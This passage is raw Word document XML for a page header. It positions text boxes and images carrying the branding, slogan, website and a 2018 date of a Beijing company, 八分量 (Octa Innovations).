              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.2pt;margin-top:-7.45pt;width:132.1pt;height:31.9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rrDwIAAOMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU0uOEzEQ3SNxB8t70p0on5lWnNEwo0FI&#10;w0caOIDjdqctbJexnXQPB4AbsGLDnnPlHJTdSYiGHaIXlqvLflXv1fPyqjea7KQPCiyj41FJibQC&#10;amU3jH78cPfigpIQua25BisZfZSBXq2eP1t2rpITaEHX0hMEsaHqHKNtjK4qiiBaaXgYgZMWkw14&#10;wyOGflPUnneIbnQxKct50YGvnQchQ8C/t0OSrjJ+00gR3zVNkJFoRrG3mFef13Vai9WSVxvPXavE&#10;oQ3+D10YriwWPUHd8sjJ1qu/oIwSHgI0cSTAFNA0SsjMAdmMyydsHlruZOaC4gR3kin8P1jxdvfe&#10;E1UzOplRYrnBGe2/f9v/+LX/+ZVMkj6dCxUee3B4MPYvocc5Z67B3YP4FIiFm5bbjbz2HrpW8hr7&#10;G6ebxdnVASckkHX3Bmqsw7cRMlDfeJPEQzkIouOcHk+zkX0kIpWcLxbzBaYE5qblbDGf5RK8Ot52&#10;PsRXEgxJG0Y9zj6j8919iKkbXh2PpGIW7pTWef7ako7RyxlK8CRjVER7amUYvSjTd6ip7YFdIjRQ&#10;i/26H4Q8iraG+hHpehhch68ENy34L5R06DhGw+ct95IS/dqiZJfj6TRZNAfT2WKCgT/PrM8z3AqE&#10;YjRSMmxvYrb1QOAapW1UZp1mMHRyaBmdlMU4uD5Z9TzOp/68zdVvAAAA//8DAFBLAwQUAAYACAAA&#10;ACEA32AKbd0AAAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2Sk3bZkU0BraToh&#10;0K4gtoHELWu8tqJxqiZby9tjuMDNlj/9/v5iM/lOXHCIbSADy4UCgVQF11Jt4LDfztcgYrLkbBcI&#10;DXxhhE15fVXY3IWRXvGyS7XgEIq5NdCk1OdSxqpBb+Mi9Eh8O4XB28TrUEs32JHDfSdXSt1Jb1vi&#10;D43t8bHB6nN39gbenk8f71q91E/+th/DpCT5TBozu5ke7kEknNIfDD/6rA4lOx3DmVwUnYH5UmtG&#10;f4cMBBMrnXGZowGdKZBlIf9XKL8BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAGo5q6w8C&#10;AADjAwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA32AK&#10;bd0AAAAKAQAADwAAAAAAAAAAAAAAAABpBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AHMFAAAAAA==&#10;" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="1E3D3D14" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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2E5CD779" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r w:rsidR="00A5661A">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251651072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2050A881" wp14:editId="591CD840">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>4372610</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-63963</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0"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3862D4AC" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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4285A5BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="2050A881" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.3pt;margin-top:-5.05pt;width:132.1pt;height:31.9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FBEQIAAOMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU82O0zAQviPxDpbvNGnoz27UdLXsahHS&#10;AistPIDrOI2F7TG226Q8ALwBJy7c97n6HIydtlRwQ+RgeTIz38z3zXhx1WtFtsJ5Caai41FOiTAc&#10;amnWFf344e7FBSU+MFMzBUZUdCc8vVo+f7bobCkKaEHVwhEEMb7sbEXbEGyZZZ63QjM/AisMOhtw&#10;mgU03TqrHesQXausyPNZ1oGrrQMuvMe/t4OTLhN+0wge3jeNF4GoimJvIZ0unat4ZssFK9eO2Vby&#10;QxvsH7rQTBoseoK6ZYGRjZN/QWnJHXhowoiDzqBpJBeJA7IZ53+weWyZFYkLiuPtSSb//2D5u+2D&#10;I7KuaDGjxDCNM9p//7b/8bT/+ZUUUZ/O+hLDHi0Ghv4V9DjnxNXbe+CfPDFw0zKzFtfOQdcKVmN/&#10;45iZnaUOOD6CrLq3UGMdtgmQgPrG6SgeykEQHee0O81G9IHwWHI2n8/m6OLom+TT+WyaSrDymG2d&#10;D68FaBIvFXU4+4TOtvc+xG5YeQyJxQzcSaXS/JUhXUUvp8U0JZx5tAy4nkrqil7k8TvUVObALhIa&#10;qIV+1SchXx5FW0G9Q7oOhq3DV4KXFtwXSjrcuIr6zxvmBCXqjUHJLseTSVzRZEym8wINd+5ZnXuY&#10;4QhV0UDJcL0Jaa0HatcobSMT6ziDoZNDy7hJSYzD1sdVPbdT1O+3ufwFAAD//wMAUEsDBBQABgAI&#10;AAAAIQAfkhHb3wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsWjuFRGma&#10;SYVAbEGUh9SdG0+TiHgcxW4T/h6zosvRHN17brmdbS/ONPrOMUKyVCCIa2c6bhA+3p8XOQgfNBvd&#10;OyaEH/Kwra6vSl0YN/EbnXehETGEfaER2hCGQkpft2S1X7qBOP6ObrQ6xHNspBn1FMNtL1dKZdLq&#10;jmNDqwd6bKn+3p0swufLcf91r16bJ5sOk5uVZLuWiLc388MGRKA5/MPwpx/VoYpOB3di40WPkOV5&#10;FlGERaISEJFYp6s45oCQ3uUgq1JeTqh+AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPd7&#10;cUERAgAA4wMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AB+SEdvfAAAACgEAAA8AAAAAAAAAAAAAAAAAawQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAAB3BQAAAAA=&#10;" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="3862D4AC" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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4285A5BF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">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74C65" w14:textId="2390F266" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
    <w:pPr>
      <w:pStyle w:val="aa"/>
      <w:pBdr>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AB00B66" wp14:editId="6CD94321">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>3947022</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-313166</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="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41BF1DB0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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5BE2B6F0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="0AB00B66" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:310.8pt;margin-top:-24.65pt;width:132.1pt;height:31.95pt;z-index:-251649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G5EQIAAOMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO0zAQvSPxD5bvNGnVtLtR3dWyq0VI&#10;C6y08AGu4zQWscfYbpPyAfAHe+LCne/qd+zYaUsFN0QOlicz82bem/Hiqtct2UrnFRhGx6OcEmkE&#10;VMqsGf308e7VBSU+cFPxFoxkdCc9vVq+fLHobCkn0EBbSUcQxPiys4w2Idgyy7xopOZ+BFYadNbg&#10;NA9ounVWOd4hum6zSZ7Psg5cZR0I6T3+vR2cdJnw61qK8KGuvQykZRR7C+l06VzFM1sueLl23DZK&#10;HNrg/9CF5spg0RPULQ+cbJz6C0or4cBDHUYCdAZ1rYRMHJDNOP+DzWPDrUxcUBxvTzL5/wcr3m8f&#10;HFEVo8WYEsM1zmj/9H3/49f+5zcyifp01pcY9mgxMPSvocc5J67e3oP47ImBm4abtbx2DrpG8gr7&#10;G8fM7Cx1wPERZNW9gwrr8E2ABNTXTkfxUA6C6Din3Wk2sg9ExJKz+Xw2R5dA3zQv5rMileDlMds6&#10;H95I0CReGHU4+4TOt/c+xG54eQyJxQzcqbZN828N6Ri9LCZFSjjzaBVwPVulGb3I43eo2ZoDu0ho&#10;oBb6VZ+EnB5FW0G1Q7oOhq3DV4KXBtxXSjrcOEb9lw13kpL2rUHJLsfTaVzRZEyL+QQNd+5ZnXu4&#10;EQjFaKBkuN6EtNYDtWuUtlaJdZzB0MmhZdykJMZh6+Oqntsp6vfbXD4DAAD//wMAUEsDBBQABgAI&#10;AAAAIQDnV0x93wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsWrsljdIQ&#10;p6qK2IIoD4mdG0+TiHgcxW4T/p7pqixHc3TvucVmcp044xBaTxoWcwUCqfK2pVrDx/vzLAMRoiFr&#10;Ok+o4RcDbMrbm8Lk1o/0hud9rAWHUMiNhibGPpcyVA06E+a+R+Lf0Q/ORD6HWtrBjBzuOrlUKpXO&#10;tMQNjelx12D1sz85DZ8vx++vRL3WT27Vj35Sktxaan1/N20fQUSc4hWGiz6rQ8lOB38iG0SnIV0u&#10;UkY1zJL1AwgmsmzFYw6MJinIspD/J5R/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAtN&#10;wbkRAgAA4wMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;AOdXTH3fAAAACgEAAA8AAAAAAAAAAAAAAAAAawQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAAB3BQAAAAA=&#10;" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="41BF1DB0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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用科技</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                      <w:t>构筑可信云生态</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="5BE2B6F0" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">
                    <w:pPr>
                      <w:pStyle w:val="aa"/>
                      <w:pBdr>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:pBdr>
                      <w:spacing w:line="240" w:lineRule="exact"/>
                      <w:jc w:val="right"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                      </w:rPr>
                      <w:t>www.8lab.cn</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1632E2BD" wp14:editId="3D7A5F21">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-557599</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-305556</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1677670" cy="405765"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="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05765"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525">
                        <a:noFill/>
                        <a:miter lim="800000"/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="529EFBCD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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382EC762" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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wps:txbx>
                    <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="1632E2BD" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-43.9pt;margin-top:-24.05pt;width:132.1pt;height:31.95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PNEAIAAOMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8GO0zAQvSPxD5bvNGnVtLtR09Wyq0VI&#10;C6y08AGu4zQWtsfYbpPyAfAHe+LCne/qd+zYaUsFN0QOlicz82bem/HiqteKbIXzEkxFx6OcEmE4&#10;1NKsK/rp492rC0p8YKZmCoyo6E54erV8+WLR2VJMoAVVC0cQxPiysxVtQ7BllnneCs38CKww6GzA&#10;aRbQdOusdqxDdK2ySZ7Psg5cbR1w4T3+vR2cdJnwm0bw8KFpvAhEVRR7C+l06VzFM1suWLl2zLaS&#10;H9pg/9CFZtJg0RPULQuMbJz8C0pL7sBDE0YcdAZNI7lIHJDNOP+DzWPLrEhcUBxvTzL5/wfL328f&#10;HJF1RQuUxzCNM9o/fd//+LX/+Y1Moj6d9SWGPVoMDP1r6HHOiau398A/e2LgpmVmLa6dg64VrMb+&#10;xjEzO0sdcHwEWXXvoMY6bBMgAfWN01E8lIMgOjayO81G9IHwWHI2n8/m6OLom+bFfFakEqw8Zlvn&#10;wxsBmsRLRR3OPqGz7b0PsRtWHkNiMQN3Uqk0f2VIV9HLYlKkhDOPlgHXU0ld0Ys8foeayhzYRUID&#10;tdCv+kHIo2grqHdI18GwdfhK8NKC+0pJhxtXUf9lw5ygRL01KNnleDqNK5qMaTGfoOHOPatzDzMc&#10;oSoaKBmuNyGt9UDtGqVtZGIdZzB0cmgZNymJcdj6uKrndor6/TaXzwAAAP//AwBQSwMEFAAGAAgA&#10;AAAhAPxvO47eAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj8FuwjAQRO+V+g/WVuoNbKoAaRoH&#10;Va16LSoFJG4mXpKo8TqKDUn/vsuJ3mY1o5m3+Wp0rbhgHxpPGmZTBQKp9LahSsP2+2OSggjRkDWt&#10;J9TwiwFWxf1dbjLrB/rCyyZWgksoZEZDHWOXSRnKGp0JU98hsXfyvTORz76StjcDl7tWPim1kM40&#10;xAu16fCtxvJnc3Yadp+nwz5R6+rdzbvBj0qSe5ZaPz6Mry8gIo7xFoYrPqNDwUxHfyYbRKthki4Z&#10;PbJI0hmIa2K5SEAcWcxTkEUu/79Q/AEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDzxlPN&#10;EAIAAOMDAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD8&#10;bzuO3gAAAAoBAAAPAAAAAAAAAAAAAAAAAGoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAdQUAAAAA&#10;" filled="f" stroked="f">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="529EFBCD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">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北京八分量信息科技有限公司</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="382EC762" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="002917CD">
                    <w:pPr>
                      <w:pStyle w:val="aa"/>
                      <w:pBdr>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:pBdr>
                      <w:spacing w:line="240" w:lineRule="exact"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                      </w:rPr>
                      <w:t>O</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                      </w:rPr>
                      <w:t>cta Innovations</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E672DAE" wp14:editId="2EDF25EF">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-1132205</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-564515</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7574280" cy="10701020"/>
          <wp:effectExtent l="0" t="0" r="0" b="571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4411" cy="10700952"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FEC57C2" wp14:editId="78EF5B8E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:posOffset>219710</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="margin">
                <wp:posOffset>9735820</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5747385" cy="564515"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="121" name="组合 17"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5747385" cy="564515"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="57476" cy="5647"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:nvPicPr>
                        <pic:cNvPr id="122" name="图形 33"/>
                        <pic:cNvPicPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId2">
                          <a:extLst>
                            <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                              <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                            </a:ext>
                          </a:extLst>
                        </a:blip>
                        <a:srcRect/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="831"/>
                          <a:ext cx="9023" cy="3981"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                      </pic:spPr>
                    </pic:pic>
                    <wpg:grpSp>
                      <wpg:cNvPr id="124" name="组合 34"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="51538" y="0"/>
                          <a:ext cx="5938" cy="5647"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10194" cy="5647"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="127" name="Text Box 6"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10103" cy="3683"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1C27BBCB" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                              <w:pPr>
                                <w:adjustRightInd w:val="0"/>
                                <w:snapToGrid w:val="0"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>2018</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="512" name="Text Box 7"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="46" y="2599"/>
                            <a:ext cx="10148" cy="3048"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3B5C1591" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                              <w:pPr>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="26"/>
                                  <w:szCs w:val="26"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                                  <w:b/>
                                  <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                                  <w:sz w:val="26"/>
                                  <w:szCs w:val="26"/>
                                </w:rPr>
                                <w:t>07 / 04</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:grpSp>
                  </wpg:wgp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:group w14:anchorId="0FEC57C2" id="组合 17" o:spid="_x0000_s1034" style="position:absolute;left:0;text-align:left;margin-left:17.3pt;margin-top:766.6pt;width:452.55pt;height:44.45pt;z-index:251656192;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin" coordsize="57476,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1aAyQMAAIQKAAAOAAAAZHJzL2Uyb0RvYy54bWzMVs1u4zYQvhfoOxC6&#10;O5Is+U+Is8g62WCBbTfobh+ApiiLqCSyJGU7W/TWQ497762vUbRvE/Q1OkNKihMb2G2Koj1YHv6N&#10;vvnmm6HOX+zrimy5NkI2yyA+iwLCGyZz0WyWwbfvX43mATGWNjmtZMOXwR03wYuLL78436mMj2Up&#10;q5xrAk4ak+3UMiitVVkYGlbympozqXgDi4XUNbUw1Jsw13QH3usqHEfRNNxJnSstGTcGZq/8YnDh&#10;/BcFZ/ZtURhuSbUMAJt1T+2ea3yGF+c022iqSsE6GPQZKGoqGnjp4OqKWkpaLY5c1YJpaWRhz5is&#10;Q1kUgnEXA0QTR0+iudGyVS6WTbbbqIEmoPYJT892y77e3moicsjdOA5IQ2tI0p+//XT/8WcSz5Ce&#10;ndpksOtGq3fqVncTGz/CiPeFrvEfYiF7R+zdQCzfW8JgcjJLZ8l8EhAGa5NpOoknnnlWQnqOjrHy&#10;+uDgdDjm8IT9K0NENgBRgmXw6zgC64ijT2sJTtlW86BzUn+Wj5rq71o1gnQqasVaVMLeOWlC4hBU&#10;s70V7Fb7wSHd457u+1/+uP/9V5IkyAkewV14BobhkYt1JdQrUVXIOdodWND0E02ciNfr7UqytuaN&#10;9QWkeQW4ZWNKoUxAdMbrNQc96Nd57CQNSXxjLL4O0+lE/cN4fhlFi/HL0WoSrUZpNLseXS7S2WgW&#10;Xc/SKJ3Hq3j1I56O06w1/I1ktLpSosMKs0